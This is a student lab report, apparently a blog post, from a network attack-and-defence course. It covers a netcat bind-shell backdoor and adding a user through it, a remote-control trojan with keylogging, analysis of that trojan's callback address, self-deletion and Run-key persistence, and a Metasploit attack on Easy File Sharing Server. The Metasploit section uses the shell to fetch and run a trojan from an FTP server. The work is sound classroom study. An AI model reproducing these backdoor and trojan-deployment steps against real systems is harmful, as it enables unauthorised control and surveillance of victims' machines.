网络对抗实验报告四_卿易

中国人民公安大学 网络对抗技术 实验报告四

网络侦查与网络扫描

学 号: 201720410020

区 队: 18网络实验班

实验任务

1.通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。

2.了解并熟悉常用的网络攻击工具,木马的基本功能;

3.达到巩固课程知识和实际应用的目的。



任务一 利用NC控制电脑

熟悉NetCat(简称nc,具有网络军刀之称,它小巧精悍且功能强大,说它小巧精悍,是因为他的软件大小现在已经压缩到只有十几KB,而且在功能上丝毫不减;实验过程需要两个同学相互配合完成):

将nc.exe拷贝到受害者的机器 (同学A)上,执行:"nc.exe -l -p 2222 -e cmd.exe"留下后门,监听2222端口:

攻击者(同学B)使用nc进行连接,即执行命令"nc.exe 192.168.31.137 2222",发现得到shell,可以执行dir命令:

攻击者添加用户"nc1",密码为"nc1":

在受害者机器上查看发现"nc1"用户添加成功:

任务二 利用木马控制电脑

利用g0host生成木马发送给受害者实现电脑控制

使用“不安装运行”方法生成木马服务端:

受害者运行后,与攻击者建立网络连接,并且能够实现屏幕记录、文件管理、键盘记录、会话管理等功能,即获取了受害者主机管理员权限:

实现文件管理功能:

实现屏幕记录功能:

实现键盘记录功能:

会话管理进行重启之后,自启动失败(未发现server.exe进程)

任务三 木马分析

将任务二中生成的木马设置具备自删除功能和自启动功能,对其进行分析。回答以下问题(截图证明)



1.该木马的回连IP是?

通过查看“火绒剑”查看主机网络连接情况,发现木马建立的网络连接,得知攻击者ip:192.168.8.129

2.该木马的回连端口是?

由上一问知回连端口是2012。

3.该木马自删除后,会将自身的宿主程序改成什么名字,并隐藏到系统其它目录中?

在受害者机器上运行“火绒剑”捕获进程,然后运行木马。并且以木马程序进程的pid和有害行为作为过滤器:

如下结果显示木马进行了自删除和注册表修改实现自启动:

跳转到自删除的具体位置,开放所有行为,发现木马创建了“C:\Windows\7CB6F956\svchsot.exe”程序并且运行了,同时删除了自己,怀疑"svchsot.exe"为木马自删除后的宿主程序:

右键查看任务组信息,发现修改的注册表是开机启动相关的:

去“火绒剑”启动项一栏里查看,发现未知程序修改了开机启动项,其路径为“C:\Windows\7CB6F956\svchsot.exe”,确定该木马自删除后,会将自身的宿主程序改成"svchsot.exe":

4.该木马依靠什么方法实现自启动的,怎么实现的?

由上一问知,是通过修改"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"这一注册表项,添加木马"svchsot.exe"文件路径,实现开机自动启动。

任务四 msf攻击体验

1.在主机A上搭建easyfile,安装文件为efssetup,请见在线学习平台。

2.在主机B上安装metasploitframework,并在安装目录中启动/bin下的msfconsole

3.进入msf命令行后使用search命令查找相关模块,use 加载模块,show options 查看参数。

4.把远程目标参数rhosts设置为被攻击者的IP地址,开始攻击。

5.进入到meterpreter> 命令行下,说明已经获取到shell,使用sysinfo查看目标系统的信息,screenshot截屏。

6.下面的步骤是进一步控制目标机器,上传木马。

攻击者主机上搭建ftp服务器,生成木马服务端放在桌面:

msf的console里执行shell命令获取shell然后连接刚刚搭建的ftp服务器,并且下载木马:

被攻击机上查看发现下载成功:

msf远程shell执行上述木马,立刻就与攻击者主机连上了:

posted @ 2020-12-03 11:03  卿董很忙  阅读(205)  评论(0)    收藏  举报